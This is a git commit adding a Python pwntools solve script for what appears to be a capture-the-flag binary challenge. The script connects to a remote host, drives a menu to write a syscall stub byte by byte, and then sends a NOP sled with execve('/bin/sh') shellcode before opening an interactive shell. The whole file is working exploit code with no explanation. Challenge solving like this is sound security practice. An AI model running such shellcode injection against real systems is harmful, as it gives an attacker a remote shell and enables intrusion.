solve script

2024-11-18 19:52:31 +03:00
parent 3b9dba1423
commit 031201a421
1 changed files with 65 additions and 0 deletions
@@ -0,0 +1,65 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./challenge", checksec=False)
+# r = process()
+r = remote("94.72.112.248", 1243)
+
+# funcs
+s = lambda a: r.sendline(a)
+inc = lambda: r.sendline(b"2")
+
+# read
+for i in range(3): s(b"3")
+s(b"5")
+s(b"6") # 48
+inc()
+s(b"4")
+s(b"3")
+s(b"5") # 89
+inc()
+for i in range(2): s(b"4")
+for i in range(2): s(b"3")
+for i in range(5): s(b"6")
+s(b"5") # d6
+inc()
+for i in range(3): s(b"3")
+s(b"5")
+s(b"6") # 48
+inc()
+for i in range(4): s(b"3")
+for i in range(6): s(b"6")
+s(b"5") # 31
+inc()
+for i in range(2): s(b"4")
+for i in range(3): s(b"6")
+s(b"3")
+s(b"5") # d2
+inc()
+for i in range(2): s(b"4")
+for i in range(9): s(b"6")
+for i in range(2): s(b"3")
+s(b"5") # b2
+inc()
+for i in range(17): s(b"5") # ff
+inc()
+s(b"5") # 0f
+inc()
+for i in range(2): s(b"3")
+s(b"5")
+for i in range(6): s(b"6") # 05
+s(b"7")
+
+# execve
+sc = """
+lea rdi, [rsi+35]
+xor rsi, rsi
+xor rdx, rdx
+mov rax, 59
+syscall
+"""
+sc = b"\x90"*16 + asm(sc) + b"/bin/sh\0"
+s(sc)
+
+r.interactive()